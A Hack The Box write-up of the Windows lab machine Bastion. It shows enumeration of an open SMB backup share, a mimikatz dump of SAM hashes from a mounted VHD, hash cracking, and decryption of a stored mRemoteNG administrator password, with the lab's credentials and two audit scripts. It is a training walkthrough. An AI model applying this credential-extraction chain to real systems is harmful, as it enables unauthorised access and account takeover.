Hackthebox | Bastion Writeup

ncpd
Sep 10 · 4 min read

Bastion was an easy-rated Windows box from Hack The Box, with challenges ranging from recovering credentials out of VHD images on an SMB share to exploiting the mRemoteNG password vault.

Enumeration

Bastion matrix

Like every box, we start by adding Bastion (10.10.10.134) to our /etc/hosts file as bastion.htb. We then run an nmap scan on it and get the results below.

root@kali# nmap -sC -sS -o scan bastion.htb
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-27 16:40 EDT
Nmap scan report for bastion.htb (10.10.10.134)
Host is up (0.34s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

We get SSH (port 22), NetBIOS (ports 135/139) and SMB (port 445). The OpenSSH version (7.9, released in 2018) is recent and rarely the attack vector on CTFs, so no time is lost on it. Enumerating SMB shares with no account returns nothing, but it is allowed with any random username. Enumerating with smbmap gives the following results.

root@kali# smbmap -H 10.10.10.134 -u anyusername
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.134...
[+] IP: 10.10.10.134:445 Name: 10.10.10.134
Disk Permissions
---- -----------
ADMIN$ NO ACCESS
Backups READ, WRITE
C$ NO ACCESS
IPC$ READ ONLY

We can now connect to the Backups share with smbclient and find a note.txt file telling sysadmins not to transfer backups over the network because the VPN is too slow.

root@kali# cat note.txt

Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

Under the WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351 directory, we find multiple files and two VHD files, which are virtual hard disk images. The easiest way for me to explore those files was to fire up my Windows VM, connect it to the HTB VPN and mount the VHD directly, since Windows supports that natively. Once mounted, it looked like we had a whole Windows system backup there.

Windows Registry Hashes Dump

On Windows systems, password hashes are stored in two registry hive files, SAM and SYSTEM, located under C:\Windows\system32\config. They are locked while the system is running, but not when the disk is merely mounted from a backup image. Using mimikatz, we can extract the hashes from those files.

mimikatz # lsadump::sam /system:SYSTEM /sam:SAM
Domain : L4MPJE-PC
SysKey : 8b56b2cb5033d8e2e289c26f8939a25f
Local SID : S-1-5-21-18827714-3633218324-154007371
SAMKey : 335e6c10b1dce6433e9ef82d30f49d3a
RID : 000001f4 (500)
User : Administrator
Hash NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0
RID : 000001f5 (501)
User : Guest
RID : 000003e8 (1000)
User : L4mpje
Hash NTLM: 26112010952d963c8dc4217daec986d9
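
As an added example (not from the writeup or from mimikatz), this parses lsadump::sam output like the dump above into records and audits them the way a defender would review a leaked SAM: flag accounts whose NT hash is the well-known hash of the empty string (no password set) and list every account whose hash could be cracked offline. The sample dump is constructed from the values shown above.

```python
import re

# NT hash of the empty string, a well-known constant: an account showing it has no password set.
EMPTY_NTLM = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample modelled on the lsadump::sam output shown in the writeup.
SAMPLE_DUMP = """\
Domain : L4MPJE-PC
SysKey : 8b56b2cb5033d8e2e289c26f8939a25f
Local SID : S-1-5-21-18827714-3633218324-154007371
SAMKey : 335e6c10b1dce6433e9ef82d30f49d3a
RID : 000001f4 (500)
User : Administrator
Hash NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0
RID : 000001f5 (501)
User : Guest
RID : 000003e8 (1000)
User : L4mpje
Hash NTLM: 26112010952d963c8dc4217daec986d9
"""

RID_RE = re.compile(r"^RID\s*:\s*[0-9a-fA-F]+\s*\((\d+)\)")
USER_RE = re.compile(r"^User\s*:\s*(\S+)")
NTLM_RE = re.compile(r"^Hash NTLM\s*:\s*([0-9a-fA-F]{32})")


def parse_sam_dump(text):
    """Turn lsadump::sam output into a list of {rid, user, ntlm} dicts.
    An account with no 'Hash NTLM' line (Guest above) gets ntlm=None."""
    accounts, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if m := RID_RE.match(line):  # each RID line starts a new account record
            current = {"rid": int(m.group(1)), "user": None, "ntlm": None}
            accounts.append(current)
        elif current is not None and (m := USER_RE.match(line)):
            current["user"] = m.group(1)
        elif current is not None and (m := NTLM_RE.match(line)):
            current["ntlm"] = m.group(1).lower()
    return accounts


def audit(accounts):
    """Findings a defender wants from a leaked SAM: empty passwords first,
    then every account whose NT hash can be cracked offline."""
    findings = []
    for a in accounts:
        if a["ntlm"] == EMPTY_NTLM:
            findings.append((a["user"], "empty password"))
        elif a["ntlm"]:
            findings.append((a["user"], "NT hash present, crackable offline"))
    return findings
```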

A quick hash crack on hashkiller.co.uk gives bureaulampje as the password for the L4mpje user. We can then SSH in as L4mpje with this password and grab the user flag on the desktop.

root@kali# ssh L4mpje@bastion.htb
L4mpje@bastion.htb's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

l4mpje@BASTION C:\Users\L4mpje>

Privilege Escalation

Starting off by listing the installed software in C:\Program Files (x86), mRemoteNG stood out. I looked at the user data kept in AppData\Roaming\mRemoteNG and found an XML file named confCons.xml containing the application's encrypted connection passwords.

<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" ..................................
Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
..................................
</mrng:Connections>
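
As an added audit helper (not the writeup's own code and not the decryption script mentioned below), this walks a confCons.xml and lists the connection entries that carry a saved password, flagging privileged usernames, which is what an administrator reviewing user profiles for stored credentials wants to see. The attribute names follow mRemoteNG's file format as I understand it, the privileged-name watch-list is an assumption, and the sample file is constructed with placeholder ciphertext.

```python
import xml.etree.ElementTree as ET

MRNG_NS = "http://mremoteng.org"
PRIVILEGED = {"administrator", "admin", "root"}  # assumed watch-list of privileged usernames

# Constructed sample in the shape of confCons.xml; attribute names are assumed from
# mRemoteNG's format and the Password values are placeholders, not real ciphertext.
SAMPLE_CONFCONS = """<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" EncryptionEngine="AES"
                  BlockCipherMode="GCM" KdfIterations="1000" ConfVersion="2.6">
  <Node Name="DC01" Type="Connection" Protocol="RDP" Hostname="dc01.example.test"
        Username="Administrator" Domain="" Password="BASE64_CIPHERTEXT_PLACEHOLDER" />
  <Node Name="Linux hosts" Type="Container">
    <Node Name="web01" Type="Connection" Protocol="SSH2" Hostname="web01.example.test"
          Username="deploy" Domain="" Password="" />
    <Node Name="web02" Type="Connection" Protocol="SSH2" Hostname="web02.example.test"
          Username="root" Domain="" Password="ANOTHER_PLACEHOLDER" />
  </Node>
</mrng:Connections>
"""


def _root(xml_text):
    data = xml_text.encode("utf-8") if isinstance(xml_text, str) else xml_text
    root = ET.fromstring(data)
    if root.tag != "{%s}Connections" % MRNG_NS:
        raise ValueError("not an mRemoteNG connections file")
    return root


def stored_credentials(xml_text):
    """Return every connection entry that carries a saved (encrypted) password.
    Containers nest Node elements, so the whole tree is walked with iter()."""
    found = []
    for node in _root(xml_text).iter("Node"):
        if node.get("Type") != "Connection" or not node.get("Password"):
            continue
        user = node.get("Username", "")
        found.append({
            "name": node.get("Name"),
            "hostname": node.get("Hostname"),
            "protocol": node.get("Protocol"),
            "username": user,
            "privileged": user.lower() in PRIVILEGED,
        })
    return found


def vault_settings(xml_text):
    """Surface the file-level crypto parameters an auditor will want to record."""
    root = _root(xml_text)
    return {k: root.get(k) for k in ("EncryptionEngine", "BlockCipherMode", "KdfIterations")}
```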

When I did Bastion I searched for a way to decrypt mRemoteNG passwords and found haseebT's repo on GitHub containing a nice Python script to do it. You can find it here. Feeding it the encrypted password gave us a new password, which is the Administrator one.

./mremoteng_decrypt.py -s 'aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=='
thXLHM96BeKL0ER2

There's no more work on this one, as we can log in over SSH as Administrator and grab the root flag.

root@kali# ssh administrator@bastion.htb
administrator@bastion.htb's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

administrator@BASTION C:\Users\Administrator>

I really liked this box as I had to work with mimikatz for the first time and learn the Windows authentication system. I find myself better at navigating a Unix system compared to Windows, so I still need to learn to use PowerShell on other boxes. I hope you enjoyed this one; feel free to leave a comment and follow me.

Stay tuned for more articles like this one!

Happy hacking! Nicolas (@ncpd)


Written by

ncpd

Engineering student passionate about tech, information security and powerlifting.
